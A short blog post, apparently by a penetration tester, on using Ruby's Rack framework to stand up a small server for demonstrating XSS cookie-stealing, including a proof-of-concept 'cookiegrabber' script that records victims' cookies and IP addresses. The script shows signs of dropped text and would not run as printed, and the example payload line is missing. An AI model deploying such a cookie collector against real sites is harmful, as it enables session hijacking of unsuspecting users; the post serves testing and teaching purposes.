One of the many things I got introduced to at Scotland on Rails was the Rack project. Designed to help create flexible web application deployments, it creates an interface between webservers and ruby web app. frameworks (rails, sinatra etc).
Reading some of the examples, it occurred to me that Rack could be pretty handy for web application testing where sometimes it's useful to have a minimal web application to bounce things off.
One example of this is demo'ing XSS attacks. A standard XSS attack is cookie stealing. The way this works is the attacker inserts a script tag with a reference to a URL controlled by the attacker and inserts the cookie for the victim site into a parameter to the URL.
So for example if we've found an XSS vector we can put


into the vulnerable box and if we have a server listening on that IP address we get the cookie..
Here's where rack comes in. You can use rack to very quickly create some code to listen on a port and accept the incoming request (and indeed to anything else you can do with ruby, but hey lets start small).
A proof of concept script to do something like this might look like the one below...

#!/usr/bin/env ruby
require 'rubygems'
require 'rack'
builder = do
use Rack::CommonLogger
@@grabbed =
map '/' do
run {|env| [200, {"Content-Type" => "text/html"}, "<h1> Rack Pen Test Helper</h1>"]}
map '/cookiegrabber' do
app = proc do |env|
req =
ip = req.ip.to_s
cookie = req.params['cookie'] || "No Cookie Parameter passed"
@@grabbed << [ip,cookie]
[200, {"Content-Type" => "text/html"}, "grabbed " + cookie + " from " + ip + "<br /> Grabbed " + @@grabbed.length.to_s + " cookies so far"]
run app
map '/cookiegrabbed' do
app = proc do |env|
out = ""
if @@grabbed.length > 0
@@grabbed.each do |crumb|
out << "Grabbed a cookie with value  " + crumb[1] + " from " + crumb[0] + "<br />"
out = "Nothing Grabbed so far"
[200, {"Content-Type" => "text/html"}, out]
run app
end builder, :Port => 9292


Security Geek, Kubernetes, Docker, Ruby, Hillwalking